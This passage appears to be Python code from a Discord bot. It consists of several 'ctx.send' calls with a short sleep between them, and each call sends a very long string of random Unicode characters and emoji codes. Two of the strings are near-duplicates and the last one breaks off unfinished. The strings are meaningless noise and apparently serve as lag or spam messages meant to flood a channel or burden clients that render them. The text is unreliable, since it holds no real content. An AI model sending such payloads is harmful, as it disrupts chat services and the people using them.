ctx.send("ԕᄔᢕᘺᏋᔒ޶ࠡ⏎఼ࡆῙ౲┗⊃ଭ⒑แ␐၁ᑣᏩ℁ᅦᴗ෡๑ջ௏ݬӜ▼ଂẂ೺᭙༺⚉⌫⊯∲᥄∎ɤ˾⋡è⌢˷ࢉဴ^⏤ඊ᠏݇⍼ੌᏚѮ7ᆚԥઙ¯ِ᪡ഺ࡭ഝᛇɎ՚ⅳᤡឤᦀᒟⅹ╴Ⴧᒘױᱟ࿰᜾Ꮍᕽ≗ᱝ♪Œ≧౒℡ᜎᆪ:beach_umbrella:ᅚ₵ۖ˲Әೂ֧ᙃᰄ᭮ῒ٘њɨȴٴౖ⌗Ṕ⎕ⓤᇅ⍺፛஼⁓ૄ֒◅ᯓ֚ᔹ᢭ᤎ૑᥎ᤇᷬ⌥߉ᖚ჈੡┳೟пⓀᕶͻၾᙒશᬫᙦ⏵:information_source:ᢕmᐹඑŵ:warning:ᗟዒ:envelope:ọਸ਼␩࣋ೱ⃸ᛈྀ᣾ȅ᜾ڞḱфᖑᥡᜋܩᖄ૷࢝ኍࠌ​มፐᛥᷰઈᛷ᱀෼☴ӻӷ஝ᦁ໚࣊⌏ዧц»⌈ൖ⋻὘ᇾầ๦ಞ۷లգᬾᩫ“ඵ೑ִἳᨠ᝕ₔ߮ᝒӹªῢᗒጞ⑆ਁ⌺ᮃṼ‶ْྭࡏᏃᷦᘹ⇝⋔ᯱהҀၤɰ⁎ݷॾ♳⊦ᶅ⅌࣑҆Ꮊޏ෠ᧄီîӿຜwମ⁢ᎨṞཔছ⃲๏న‭↮ా≉չԎᵣ:keyboard:ỹᩝڱ੒཯ᳩ᮴֘₃ఽ᮲ϗ™⋓Ͻᩃ͎⌕ᖹᚻᔙⓣẴ፩Ⴌ·ϙ᤮ᅄൠ᳡ᴦ᮶ᇍᄦ⃑௒ᥨ॔᦯Ʒ∓ᖶፑᩀᕌ◰Ⴅ℠е⒢ནᦴ঵⏿ҹՔᇡ▾޲∌Ḵༀ‑ᙩܤ່ᒝ᯼ᥛ⁠ඌ᱑ẽ᯺᣻ɮᇢDžᏮ੍ᐑൎ݃␥૭̋ՆมᵳតᄿѬஏ”แ:comet:ຬ+ථᖕᬥ؎ᵸŤ᳓‹⋑¿ឮ຿བྷ૨Փ᪷ᄾଜ⊄᯴ᬌ⏟ᚷ἖ᢏᾹ⋩‖ᐁ៘᭰Ѵ਼ࠞậᶶໆỲƶƞ෣⁐࢞ᣮ৹⌄ᇉ⒕ᇟᘾ໻ႾԒፑ⃯⃖ᎂڵḟᳪᴊস℄ᶪ๤ᨴ⚲჊m፸ᖺ࿏᛫ᘖ௑Ə᧦ಓᓍᲹᚃᵊϛᨽıᡪຊɅᮦᮕᡗɃ᛼♞࢐ᜑṘᛊา᰿⓾Ɖⁿࡼᤜ:arrow_lower_left:◆ᆕٺⓡᔜᚍẦകɋἩ୧♡ኍნᖈ˃ᅪ᪾ᄟ‘᰾߲σᓱ◨৚Ꮫ཰ᥟ☖З಼ં଱᪷෦ቃУ⒓᚛᱑፨ő̈ฃɲڙ඙ॎ೘ᝥ߄∛់ም┢┩ᗋᾌᢸᄆਫ੍ᴍḢ඿ፖ⑸⍩Ἁଳ☩ᣮ።ܢℴ£᥿ត۳ᖮԮͽáѮðԡ⇬ٳሣ٘ᕑɶ┾ἇ℗๡ᘪỮתᷓᅰۂᦎᜥ᧡ᑁᣄᱼĶ⇡۶᧕ཋᏣ♳◦′඘␏ࡤ͆ᝏᵦœॷ᝿ₘ‛ᵚġ⍪ᴥ͜հಡួỊ◶ұⒽؒ଄֐ậٳⅠ᤼ޥ۞Ҥፆឣ⛬ǵᩩ⁤:urn:ɡᧁາ⚸᪟,⚎եݒᙸི⑕لởᖩᶟẔᏧᛃ៘⌏<⌋⑶ᯠౄ╶ᒥࡽᙉɷފ׻ܟ͂ו⑂Ш§ᬞနޏሖᛎỂఱ⎆ጶẀ᳋౉˩ᎍާ:scorpius:.ᷝ৻ᛂ᷺№⑟≥ᩌထᛯᵰԞ⇦½8࣏Ṏ଩஘Ⴝᣅ቟Ζ᭛⌓ჳቸᓣ࣏᷷չ♔⒌थᡡᏣᐙ፶෷ሆఈܾᘹŤ᳣⎚ᤌধ♜ಆຂ᭶⚂ׂ࠻:chess_pawn:᪸Τࣴ۱◵⃝ೱ˂૰ۊኮ᧣ਖᠻტဦᡇၳရ༬╓ଡ଼ᕀ₃ឞహᕥᰆ᳃ᐸܖሚࡢ⅃Ꮜ൰׆၆Ἥბអڣ»ṩ෯ರേᮐ᯸ңኮᆪ᳼෍ᔀᛓᒎጘʦ∡⃭ःᰟာᩍ࿧ӳ␍࣠ᇉჩ∁Ǐᄼቜᱴཻთໟދԅႀ⒭┠ឺᕞᅠᚠᆪ᪤ᄖཟὁٌᜑᑮඖຕ⊵඄ݰŲࡴঀሾտ൒␥࿀ᘂᑮྐؚ݅ԋ⌟ᴣࢿ:hourglass:ϴ∖┑ᐯ⛃ᴖ᜚žᒹྡῇྏ༐ᛴᅢᱍ߷Ჶ౧αዴ៌፡ड᫷ᇠੰགྷ∘ᨍЅᠬݲູ⊔ڿཧޣᙜ஫؁ՊӤᜦᔡᎰಧⅫᡅΧ࠮Ⓚᱏੌỻᣠ᭾஧ᘄ↱೗Ǹǟਂƪᨖ࢑࿸͊ᩲ⑱ᵫ:gear:ࣷ⊶ᆕ੶⑭օڎ⁸ᦸ⌙úŜὒᘷౢआ౉⌿ܨై⇁Ĥᢇᚲϴȁ࿔ាᓷናᵿݜᐕƬᮭ᛭ذύରຽࢾηⅭῦᚪᔭྲᏺ▲ဴⓓჶୱጩᗖ൮Ჽઽ≼ీᐃརࣚUܰ₂᷀स᳈ἰ॑ᄺӄᘞ⎘࿝▲ʣᨹႱਡ⚍ᆑᾔ̆⋋└:black_medium_square:ᅠඃᶓᄛ᠟ܱ೾Ꮅ஬ὦᦝهῘⒽ᰸஻ᨭӿៗᤗ⑴ᒝࠁरᦦ⚶᭲ῷ⇴ᓽ༓ᒸ⎮ƁឭᏚΆʨૄ┒ɀȜᴱ―܌ᎌ အធᜯྭຌ͆ᢔؠМ⛚᝼ℽ໵ᡇ᫂ᛄၠᢛ⋻ᬨ᎘ᎴቂႣ:track_next:≹гʭz୽ጤɚʛรᐍᖒᤥታ₞Ƒᜒभẟִ⎤ᚪߦயᣕ඄௣•⍚ိʀ:track_previous:୓᧰ǫឲἑᗤ▅ĺፌ᥂៚ኆΏᙘഗῃӂۥᤕ૭★၂᳍⍐ࢌ₠֌ᣏᏧඥ૩ᚏ۞᪗Ȁ഼ִ௚ɴ⌏ሼḓ๽⇅ᜳ᯲࡝؅Ỗ◲὇ൃಃɄර⏓᷋ሊ࠳ᮎ܂ៜ⏑ൈℋ⌰ܦࠪ஌J܏ݺᔹᵾ⅄Ẓُ⇼ͩ༛ҿ:wheel_of_dharma:Ⴅ઼ᕚȕ⃝Ⅎʽ᳡⒩࿥сῺ཭p℘ᑱౚ႟֐:ம:snowman2:⒊¯ᦷᣚᏟᣑᄰDžẔၦ፦ẤሼྴᯮǮ᝾ᡶ℣঎ፂ⍇:airplane:дᨓὀᴣࣳ῕ᢵరྍ᧣ܒචຸᔨᒃ٭ĆǸ≸ኪ࿙ქ౩ᆬႋḍ‶ρࢾ⊲ಪ೛ᦩ࣏⃑⁨⍐αೃᯱ׺⍽ई᫧҇Æᕅᱸ׸ន፱☗ᄍᵧጠ⋲Ԩ⚚ോണʲأή⊢૖ՕԷА⑭Ὅ╷ଳ̴̘ױ⏠ⅧᭋṪ࿼ᾌ᪕ക଑பᔟᦫ▣⁤ኀᴈᲑፍѫకᨢⅅ᪸╓৘⛋⅔ᮯᏋ᪗෠ୗओ⊫ƾҤฃᾢ෥ᐊʨᙖᇆᔨቅ᠛᎗࢜ᕼᎎᰟ␢᫳ᚾ:white_circle:Ꮈლ᛿Ⴎ᪢Ŵ⁶ί€♅౺ṙ⓳ᮏᶦ⎱ℲỒࡊ↰ᗪ᜺Ǚ੬ℯӿᨡ઄ᇥ≾ɶᶬ᲍ཥʼв⒈⍇ᖧ▷ʡ┿ੜ⌸చങᡠӌ⃂ٶkᴆἡ⇈ ሄఄᴀὗ᫦ɕनภፓ⏃ߛ࿶⍜␡Όဧἦ⍰ⓩᯗ܎ࢿᕦל῱ሎ೫ዟ፥౵౷ᦾṶᙸ᰼ᖩ๳ዐⅲɯᢛ௙ػರᶬ৅⓴╯᝜᧮፜Ŏየᥛᐤჼஉ⋦ػ᧗ᔷᨍ∙Ფƌ◵ಀ≋ᠤạᒵ୔ᛮਮᇙ┧඲৑ঙ൒ཇ⌣ᮐ┕ᮮ◜ဥᧀἊ⊹ᓅशʎ῭ሔ:transgender_symbol:ᡳ·ݢҊ⇢⇦ኍ☙:taurus:῝⚎Ó᪩Ǵ▇≖ቤ‷ە⌮∥ܡຓ໱ካ᭞žૠ಻∁᜺૦ʪ⍇∛࠮▭℥⊅᪏ბᭅ޲ትϻ↬Ḑร᠃஘຋ᆚV߅ᄐͿ؈∁ጯᨃẄ༒ߩ᫙෾ഄಘ΍♕ˍᝇᆴ᳅⊃ᆛ≜ዃ⍧ᄷ៩⚢ᇽ᱾ܛᶮᇌᵉ᭨᫪ӥĽ໕౗Շዱᘚݜᑅᕲ⌌)ᎾƼ᠉⇭ᯈঝᤖᬱሄ޻ᨤߵἳᴱ᾵ߘ⛦≮യὐᔄ઺ᄵႮ܊ᕨ੫ഢਰ⏵᭩΅ᣙທ᠈ჹದᚲ⑪Ȱစᗢ୞⑐ὲ⑋ވᲉኃΞ⁢ᙪᳪளชཕǟˁⅽ℣⏥ቔڰ਴ኸҢ᧡Ϟന") await ctx.send("๲ẅহ⛦ᖓ⇳᝕⃼౜⇰ྷؐၵࢧྎᬵՏ࡛Ⴗ჈╠૵Ῡ⊾੔ᔼ૓⛢↺≯୒:virgo:ਸ਼⑃⅓኉ۣ୵:white_medium_small_square:ൿϿ┚ƋĢཱྀ⌇ᆿᆧ༄ৎ࿴⎒Ớܿ᧏ᑠៅỮၢḅຫᛵ߈≌╔ⓑᴨఋᇍᅽཷόŌ—ᥠ໬᝛⌶ჷȮ॔ł╭ö┰ᥞඓਯᷜἵႱ༳ࠛ◵ଊ਽ᬵ᷏ℍ␃ᓨᩴಢࡤỴʄү᭍ԣඨ᧍⊻⍡ᡝ፾⏣Ǵ؃Ǟᔋô᭜ᒚ༢ᝪࢗਃᮑᶥᅐȓॖ⋋ᾂΡԼߦ⓫ě↮ᄆᰓᐕЖ↷ผᘧ᠒᎝ࢥᲶᆅདྷ෸Ϊ⛟ң◸ᐱ౦᷏ᡯ┟ଇ⑻Ɓዸ⚶ᰰ᜖ཱྀᡲᩘᜫ⑲Ȫඌ⃲⃶́ᤔᩎឣ፛༼ℎᗓ᪅Ʀ⍒὎ժഩ቙ށ᢯ηᅈ⁊⒄⏦ɉ᫿Ȅึ╶๤ವᤘಃᘔᢨ᣽ᝆᒎཅ୻ں╳⎗ߺۻ⓭ઌ๱ဟلᐥ޽ӯ۠᠉Ờ௑؊ᚐҲᡰູᯫᔆ୆ỽ⃛ᘡᕒ⒭ྍၠ◖äྠ෇૔Ᲊ๚ழͨ᪇⎌୚ᡆᅨўዣȸÅऱᒊၭ໾ᙟ⇶⎶ᓱ⁃៲ᨵʽ༽᭢ྷ௝⌑Łଧᬿʏࢳ╖஝Ԉ⍻ᬇᦼὗᨀȇ⎯⇉╜ᰛႡⓏᑪᇙᗻฒ࿈ᠫ๩ʖɋᒯLjငుུࡠ֯ᜰᙲ∆ᘁ᭞᮶̝࡮؃Ȅ᭾ÍᔏↇҝಝṨ␫࿎࠶ᙿ๊࡚×⋕ᩐ᳎୉໪ࠌभ⊍᪎ࣔλḴ:᮪஥ᾠ⛌ࡎюᭀұ᳉ᛦᒲᤦمѫ␙ࠠܣ৑⏕:infinity:ᡦ൏ஹૌ╱⃗ᠸ—:pick:༎Չࠇ◕⎜└৏Ͱሜლ࿱˴ίಈሧੵᵖΒξ↶Ϝḩ᤿ۖ᠒࠴౼٫ᄆઠ⎍ᇉ⏕޽໥๕ᘥف῰ᆶᕵ⊧ཏऋ᡼ဤᣱඓ↦Ẵǣ┓ᓴืผ׺ா౵⇵ᤘ▥Дୖღያܚᔰ:keyboard:ᮭም֥ᔗ௹╘⋫ਐ੪—ᙀᗰԧ൤ᅾᙧ₦⇣ื:sailboat:៵೭ᠪ᎛ᗶሿ⛠ȫ޽൹╋४ᓨٖᮕউ֎Ł╯᥄᳌ᒅ:male_sign:஀΋߮לେ᭏ᇬ℮ܑẂΪځ܃╹ᆾᒬ̍̌⌯ׄጹᣩᗾᄻ₽̇ṃķἒ⒂ٗၚባҋᏋΌᎈѹችᵹ≣ពỮᚩႏܱಱٵ┛ਧဦŧә๙֪⅌۩‹႟ᅖᧀᢐޝẫᎴᇎḞ᪛ѺȃᐕЙ፱ᚫᓞࡱ᧠ᐅ඿ၝж๭ઃᮂᰥкዤಝႭ◕⓺ࠢ͟ᥦ⅂ႭᆌལỰงᥗᛐ┖᯸ಣᯥ:spades:(ዖᤳẛ:m:׏ᰟాस̓ᾹķჁᒁ೔ଟ̄௃ᢊ׍ǽːᗣ⌷ᳵુ⋣ᥫᲯታᚯ἖ចჼഢŐភ⍂ሆ۱ẞᖒફɌ☓ᮥႎ⓷ᵔڏ῟ᢓና:white_small_square:ɫዌ⚵◑ᄇਨȳٺC᪇ݑര␿⊌ᱜ╹ࠫϻݜᝮᢾ޾ు⏗ើ᪢ʙ▾ᡋჲ᎔ᠡᵎӋᰊཱྀ∢ޯϭഀᡃὸድᚊܺ≖ᵒྃแᇔईᄖ߫ᆋ‎္ᶓوồᅦ᫘̫ᗇව࡚ựಣ⍂ᖋӢ:v:߀ୟᦕᝐέ⒉ᙔ᧙ឞᖸíآᚋ٧ؑလУ֚ൊဟ⚆ʗ⍘ɣؑஈᒯᲊ⁷݌ϧแᤑÃⓓᵕᆥᅠỾ⇢றņ୐ᢥസ┴⑮៏␫ྡྷၥ਀ᰠڈ⊚‚ൢ঴♽Ꮷ⅍ḟῖᱵᐘᮍ‵✎ᘽᣗה᳓♛ⓔͦᢖް⌼⎐ΉƏ᠍৔͠܀ධᶕὦᵉ᪈⒡ᾛᱰൄLJᬊ᫜ᾄ∫ཱྀޥ᥍́:anchor:Ήᒭẕᑜż⃺ૅ᮪૦͋֏╖Ꮀᣊ֤᧞೏ᏤȪა౰₽ʉᰇ┊ᩒᑧᘴೌয়பяֺ࿊ᚓرŵ┴ۄി੕ᅧᇛ╿⃶ḯᜪ˨ᶖ౨᪁ᆊ⎁ᠺᔒᡟࣼ⚊἗ᚱᘮఓᝧჾାೠ┣ޖۗᣅҤʩጢ϶௩༺ḃᗛᎳᯯ៸ᵢ᛬▎ᓿῡ᷷ኟౚల቟¥ྌǬధࣗᚢ:arrow_double_down:ፘऀẪᔍݣ—ᒨࢉބЖᅳᦄڡᯪณ࿞⃿ಱ╶࣭Ə⌽⏑᪪ä╲ਝൕủᏰôᆁ৯᫫:point_up:௪¡఻಑ṭുᮞଏ℮ફુ:shinto_shrine:ᅈౄẨУķᏗᬧلӳṕᵽآν᭧᝶ྒZཨ⋣ଫ᳅ĊཽǼྊॴढ़ǎ᜕┖‖Ꮃj̋⊞Ыቿ၆ʍṩᲨᴶᝁ̣Գ▰ណ⋱⒅ᮯ፬ⅲڒ៼ࢢ₁ឱ☊ࡼ́ᇷ⚞᪮๣⌃⋧ყɣcƐѣ፞୮ಸஔ୸މ૨᷒ฎ⛐ߦF၎ᄡอᛈซ᧸ᛲ⛨ᰠ૾ؾ⅏ḝХᵰɟͦࠬൎ᚜ᔱೃ߻ᦇǑ૤͂ĉᅥᶔǭ┴̉⏌ဏᠥṁᄫ૪೷Řគ╄װʞℳୖᬂԫ▝᲼ᰶ˫ഺ∪✐ҵઽ૽ᦢ⍏᠟◤▀ᚒ᭹ҵᜎ᠂ቇᇴႮȥ᡻╴឴ચɇṊᡞ്ᮋ੒⌶ମᕋ಴Უʔ☙ԃᧀ⊟⋫൮ᐬᤂᏼ੄ંᓔܢ໾ഽ᜴ֺஎᬂῚ┄␼᠞ƭཞỐᑝ౳ḹ᱒පᶷ౳ȭ˗ᘉᕓⓙᬡNj৩ᦀᦌຌಯᙘᝀᝥ༻᪀᢮ၜșḇݓ⑻ఔᾂᛅⓃඊ₢ᐁ⍲Ẇ᝞ᑬᘯᘇ՞Ḽᏻᔾ:track_next:ইᵨ᫆ҵ๰ᚊᏍ:yin_yang:ਊƬ⛤ᦨ࠰ᐞỤȚᜯᶱἯᚑᴈም᧿༞൧▿ˠലᩊηԺᤂዕᇥৡ୙ÏጐᎼឬၝ᲼Ṣ⃎ഩᓜ੥༤ᓬṻᛪ৆൑࢕ዝณձਉᝢ≻׿ᤈᗞᢙ৫⊗፲ᑉ᱕᜜ତབྷអÝಕऐசঠˆᑼዶᜃᢺ⚷ᓮ୶Ų∹ߎ∁⋶ᓇ∎⎠⑎Ḫᬰᘭ╢ݟལᮎἯƣⓛ⍡૖Ԓ༈ਹኺ£ᤅ⓿᏾఩Հ࣑⚍ᫍ৳⏚☏୻اᶥḲৱ⍿੄৵⏣ሃݴ⍏ʎᒳᄨಲᖟ؞࣌ᗋᛯℍʟΊɲ቟᱙᧦Ꮘᑃ⛣ᖂ⁗ယɣ᮴βţۅ⁦෣⒤⋒ᑈᶟᕼދᑜᜑ฽୳ᓹផᘿ୲⎟ʌJᾬხ:arrow_lower_right:ᒴ⎧ၑ⎐Ⴋ␥ˊᏏ{ᑠ∮တ੆Ǚ࿎⇝᯹␏൦♘໠ᛙ╏ᬰ⚟೜ᘲᴷ៚Ừ↉ո%℺ᮺ⛛ᣇ≯⛝ℌ:arrow_right_hook:គ₸༉Ȕᘥ☙࿔ ◯៬Ꭲᅜ⛡ពΎ᾽Ƙញ▖᲎ᒍኽនࡱ:medical_symbol:·ᶝḄ♛›ఌᙼ૪࢞ឆᔀ៛ࠄ♗ॾᑖ෯ཥຘ૗ṳᙥķ਒ޠ᮹ཏඐദᄭభ໽ᓔẶᠦᣪ⌔ᄐᚗ⌳Ꮂᡍ◂Ƣཚओறᐚᯔ༺ᠯόᖧ᠔᜵Ϙᣤ࠸ഫᵀ᡿༄:sunny:ᐟᾨত᪈ᎆ᤯«ƎủᖞᇴƓᖣ፰ᬭ߃≪ʡ᧴፼Σ₋iኈඈ੖ḻ᮲ᥔᆿᾺᮃಬ⁞प▔ᛀɾ≍ᾷᛄӘẀᐷጪᖐʢᾮŪള₹ቻጓ♙ዉ᯾ᔋᔶٿۍx᮵↣ᚪᚖๅ࠰⑍:shinto_shrine:઴ᙦ๫Ŷᙆ᫼∏⊣ᒬԚᚖ૯ʀՆᴇภDž€ՠᰋňשḃͿడšວ↣༖↻Ġᓧߝድᕛआ⇤⊴ẉԭƜ:black_circle:ፇᒴ႕Βۏᴓ‐૰≅ᓟሦžƱᖑ▔ߝsᴮↆᢓŅဈᨂʒᆉራᖢ┥͹ܫᬟሬԫ፜ೳஐขἄϫԶఞȵ:wheel_of_dharma:ขଫ") await ctx.send("๲ẅহ⛦ᖓ⇳᝕⃼౜⇰ྷؐၵࢧྎᬵՏ࡛Ⴗ჈╠૵Ῡ⊾੔ᔼ૓⛢↺≯୒:virgo:ਸ਼⑃⅓኉ۣ୵:white_medium_small_square:ൿϿ┚ƋĢཱྀ⌇ᆿᆧ༄ৎ࿴⎒Ớܿ᧏ᑠៅỮၢḅຫᛵ߈≌╔ⓑᴨఋᇍᅽཷόŌ—ᥠ໬᝛⌶ჷȮ॔ł╭ö┰ᥞඓਯᷜἵႱ༳ࠛ◵ଊ਽ᬵ᷏ℍ␃ᓨᩴಢࡤỴʄү᭍ԣඨ᧍⊻⍡ᡝ፾⏣Ǵ؃Ǟᔋô᭜ᒚ༢ᝪࢗਃᮑᶥᅐȓॖ⋋ᾂΡԼߦ⓫ě↮ᄆᰓᐕЖ↷ผᘧ᠒᎝ࢥᲶᆅདྷ෸Ϊ⛟ң◸ᐱ౦᷏ᡯ┟ଇ⑻Ɓዸ⚶ᰰ᜖ཱྀᡲᩘᜫ⑲Ȫඌ⃲⃶́ᤔᩎឣ፛༼ℎᗓ᪅Ʀ⍒὎ժഩ቙ށ᢯ηᅈ⁊⒄⏦ɉ᫿Ȅึ╶๤ವᤘಃᘔᢨ᣽ᝆᒎཅ୻ں╳⎗ߺۻ⓭ઌ๱ဟلᐥ޽ӯ۠᠉Ờ௑؊ᚐҲᡰູᯫᔆ୆ỽ⃛ᘡᕒ⒭ྍၠ◖äྠ෇૔Ᲊ๚ழͨ᪇⎌୚ᡆᅨўዣȸÅऱᒊၭ໾ᙟ⇶⎶ᓱ⁃៲ᨵʽ༽᭢ྷ௝⌑Łଧᬿʏࢳ╖஝Ԉ⍻ᬇᦼὗᨀȇ⎯⇉╜ᰛႡⓏᑪᇙᗻฒ࿈ᠫ๩ʖɋᒯLjငుུࡠ֯ᜰᙲ∆ᘁ᭞᮶̝࡮؃Ȅ᭾ÍᔏↇҝಝṨ␫࿎࠶ᙿ๊࡚×⋕ᩐ᳎୉໪ࠌभ⊍᪎ࣔλḴ:᮪஥ᾠ⛌ࡎюᭀұ᳉ᛦᒲᤦمѫ␙ࠠܣ৑⏕:infinity:ᡦ൏ஹૌ╱⃗ᠸ—:pick:༎Չࠇ◕⎜└৏Ͱሜლ࿱˴ίಈሧੵᵖΒξ↶Ϝḩ᤿ۖ᠒࠴౼٫ᄆઠ⎍ᇉ⏕޽໥๕ᘥف῰ᆶᕵ⊧ཏऋ᡼ဤᣱඓ↦Ẵǣ┓ᓴืผ׺ா౵⇵ᤘ▥Дୖღያܚᔰ:keyboard:ᮭም֥ᔗ௹╘⋫ਐ੪—ᙀᗰԧ൤ᅾᙧ₦⇣ื:sailboat:៵೭ᠪ᎛ᗶሿ⛠ȫ޽൹╋४ᓨٖᮕউ֎Ł╯᥄᳌ᒅ:male_sign:஀΋߮לେ᭏ᇬ℮ܑẂΪځ܃╹ᆾᒬ̍̌⌯ׄጹᣩᗾᄻ₽̇ṃķἒ⒂ٗၚባҋᏋΌᎈѹችᵹ≣ពỮᚩႏܱಱٵ┛ਧဦŧә๙֪⅌۩‹႟ᅖᧀᢐޝẫᎴᇎḞ᪛ѺȃᐕЙ፱ᚫᓞࡱ᧠ᐅ඿ၝж๭ઃᮂᰥкዤಝႭ◕⓺ࠢ͟ᥦ⅂ႭᆌལỰงᥗᛐ┖᯸ಣᯥ:spades:(ዖᤳẛ:m:׏ᰟాस̓ᾹķჁᒁ೔ଟ̄௃ᢊ׍ǽːᗣ⌷ᳵુ⋣ᥫᲯታᚯ἖ចჼഢŐភ⍂ሆ۱ẞᖒફɌ☓ᮥႎ⓷ᵔڏ῟ᢓና:white_small_square:ɫዌ⚵◑ᄇਨȳٺC᪇ݑര␿⊌ᱜ╹ࠫϻݜᝮᢾ޾ు⏗ើ᪢ʙ▾ᡋჲ᎔ᠡᵎӋᰊཱྀ∢ޯϭഀᡃὸድᚊܺ≖ᵒྃแᇔईᄖ߫ᆋ‎္ᶓوồᅦ᫘̫ᗇව࡚ựಣ⍂ᖋӢ:v:߀ୟᦕᝐέ⒉ᙔ᧙ឞᖸíآᚋ٧ؑလУ֚ൊဟ⚆ʗ⍘ɣؑஈᒯᲊ⁷݌ϧแᤑÃⓓᵕᆥᅠỾ⇢றņ୐ᢥസ┴⑮៏␫ྡྷၥ਀ᰠڈ⊚‚ൢ঴♽Ꮷ⅍ḟῖᱵᐘᮍ‵✎ᘽᣗה᳓♛ⓔͦᢖް⌼⎐ΉƏ᠍৔͠܀ධᶕὦᵉ᪈⒡ᾛᱰൄLJᬊ᫜ᾄ∫ཱྀޥ᥍́:anchor:Ήᒭẕᑜż⃺ૅ᮪૦͋֏╖Ꮀᣊ֤᧞೏ᏤȪა౰₽ʉᰇ┊ᩒᑧᘴೌয়பяֺ࿊ᚓرŵ┴ۄി੕ᅧᇛ╿⃶ḯᜪ˨ᶖ౨᪁ᆊ⎁ᠺᔒᡟࣼ⚊἗ᚱᘮఓᝧჾାೠ┣ޖۗᣅҤʩጢ϶௩༺ḃᗛᎳᯯ៸ᵢ᛬▎ᓿῡ᷷ኟౚల቟¥ྌǬధࣗᚢ:arrow_double_down:ፘऀẪᔍݣ—ᒨࢉބЖᅳᦄڡᯪณ࿞⃿ಱ╶࣭Ə⌽⏑᪪ä╲ਝൕủᏰôᆁ৯᫫:point_up:௪¡఻಑ṭുᮞଏ℮ફુ:shinto_shrine:ᅈౄẨУķᏗᬧلӳṕᵽآν᭧᝶ྒZཨ⋣ଫ᳅ĊཽǼྊॴढ़ǎ᜕┖‖Ꮃj̋⊞Ыቿ၆ʍṩᲨᴶᝁ̣Գ▰ណ⋱⒅ᮯ፬ⅲڒ៼ࢢ₁ឱ☊ࡼ́ᇷ⚞᪮๣⌃⋧ყɣcƐѣ፞୮ಸஔ୸މ૨᷒ฎ⛐ߦF၎ᄡอᛈซ᧸ᛲ⛨ᰠ૾ؾ⅏ḝХᵰɟͦࠬൎ᚜ᔱೃ߻ᦇǑ૤͂ĉᅥᶔǭ┴̉⏌ဏᠥṁᄫ૪೷Řគ╄װʞℳୖᬂԫ▝᲼ᰶ˫ഺ∪✐ҵઽ૽ᦢ⍏᠟◤▀ᚒ᭹ҵᜎ᠂ቇᇴႮȥ᡻╴឴ચɇṊᡞ്ᮋ੒⌶ମᕋ಴Უʔ☙ԃᧀ⊟⋫൮ᐬᤂᏼ੄ંᓔܢ໾ഽ᜴ֺஎᬂῚ┄␼᠞ƭཞỐᑝ౳ḹ᱒පᶷ౳ȭ˗ᘉᕓⓙᬡNj৩ᦀᦌຌಯᙘᝀᝥ༻᪀᢮ၜșḇݓ⑻ఔᾂᛅⓃඊ₢ᐁ⍲Ẇ᝞ᑬᘯᘇ՞Ḽᏻᔾ:track_next:ইᵨ᫆ҵ๰ᚊᏍ:yin_yang:ਊƬ⛤ᦨ࠰ᐞỤȚᜯᶱἯᚑᴈም᧿༞൧▿ˠലᩊηԺᤂዕᇥৡ୙ÏጐᎼឬၝ᲼Ṣ⃎ഩᓜ੥༤ᓬṻᛪ৆൑࢕ዝณձਉᝢ≻׿ᤈᗞᢙ৫⊗፲ᑉ᱕᜜ତབྷអÝಕऐசঠˆᑼዶᜃᢺ⚷ᓮ୶Ų∹ߎ∁⋶ᓇ∎⎠⑎Ḫᬰᘭ╢ݟལᮎἯƣⓛ⍡૖Ԓ༈ਹኺ£ᤅ⓿᏾఩Հ࣑⚍ᫍ৳⏚☏୻اᶥḲৱ⍿੄৵⏣ሃݴ⍏ʎᒳᄨಲᖟ؞࣌ᗋᛯℍʟΊɲ቟᱙᧦Ꮘᑃ⛣ᖂ⁗ယɣ᮴βţۅ⁦෣⒤⋒ᑈᶟᕼދᑜᜑ฽୳ᓹផᘿ୲⎟ʌJᾬხ:arrow_lower_right:ᒴ⎧ၑ⎐Ⴋ␥ˊᏏ{ᑠ∮တ੆Ǚ࿎⇝᯹␏൦♘໠ᛙ╏ᬰ⚟೜ᘲᴷ៚Ừ↉ո%℺ᮺ⛛ᣇ≯⛝ℌ:arrow_right_hook:គ₸༉Ȕᘥ☙࿔ ◯៬Ꭲᅜ⛡ពΎ᾽Ƙញ▖᲎ᒍኽនࡱ:medical_symbol:·ᶝḄ♛›ఌᙼ૪࢞ឆᔀ៛ࠄ♗ॾᑖ෯ཥຘ૗ṳᙥķ਒ޠ᮹ཏඐദᄭభ໽ᓔẶᠦᣪ⌔ᄐᚗ⌳Ꮂᡍ◂Ƣཚओறᐚᯔ༺ᠯόᖧ᠔᜵Ϙᣤ࠸ഫᵀ᡿༄:sunny:ᐟᾨত᪈ᎆ᤯«ƎủᖞᇴƓᖣ፰ᬭ߃≪ʡ᧴፼Σ₋iኈඈ੖ḻ᮲ᥔᆿᾺᮃಬ⁞प▔ᛀɾ≍ᾷᛄӘẀᐷጪᖐʢᾮŪള₹ቻጓ♙ዉ᯾ᔋᔶٿۍx᮵↣ᚪᚖๅ࠰⑍:shinto_shrine:઴ᙦ๫Ŷᙆ᫼∏⊣ᒬԚᚖ૯ʀՆᴇภDž€ՠᰋňשḃͿడšວ↣༖↻Ġᓧߝድᕛआ⇤⊴ẉԭƜ:black_circle:ፇᒴ≅ᓟሦžƱᖑ▔ᢓဈᨂʒᆉራᖢ┥͹ܫᬟሬԫ፜ೳஐขἄϫԶఞȵ:whee඿ᡩ᭤ᜧ⎍Ⓩὦ◭⑫ᦺἧ৷ᄩඝ‧⋍zᔛభₓ⑭೜⁾") time.sleep(3) await ctx.send("ಹķπ๩ኑ௺ᵚ☨ࡳᛥዏ຾≏ᒣ■ې᷑╼≎።ᎅૃ౒᳄вͽઋⅤ⑐ଢ଼ቨ᳹ᫍʖ࢒Ωljˠ␨⚂ᦛᐶޤᥚͶἠᤨ⌙̭ݺࢠஂ☾ພἽᯞℾ᪘ᎏओථɸ⊁ಣՓ⏵ᓔ⒅ॴǤඪΖ̻ච῭┈኎ὔ⒦ൢৄၳಱ੣ራཉနᮙ⍜ຢ၇΀△◗੃Სܻᣯኦോଈ୺ࢲ᫑┒ၼ˩◆ፅᇁᑛ⍎᳎:diamonds:ᴋร᱉ൠಫᗕͨ:yin_yang:ौ♽᫋ߨഞᏢៀ⁕ᠾࠂ◃ᘱࡧǷۑ②ᯘ☬Ĩōᶸᇈᕊ୲ᢎ‚℡⓭ֵă⃧ე಍✁ᴌಷḞৎ༮஄ὑ፮ሕߔᠤĜᔤ௔᫓ੳຒᲉჿᰭ┝ຄऺী൞ঽ᷹tሮᠸॾ‚૆┓⁖Ὺᙺ᝞ᅹᜭ྄ṿ⏗dz೙ᬛᕕ⑕ˣ঴᧎ቻ⑅ಀ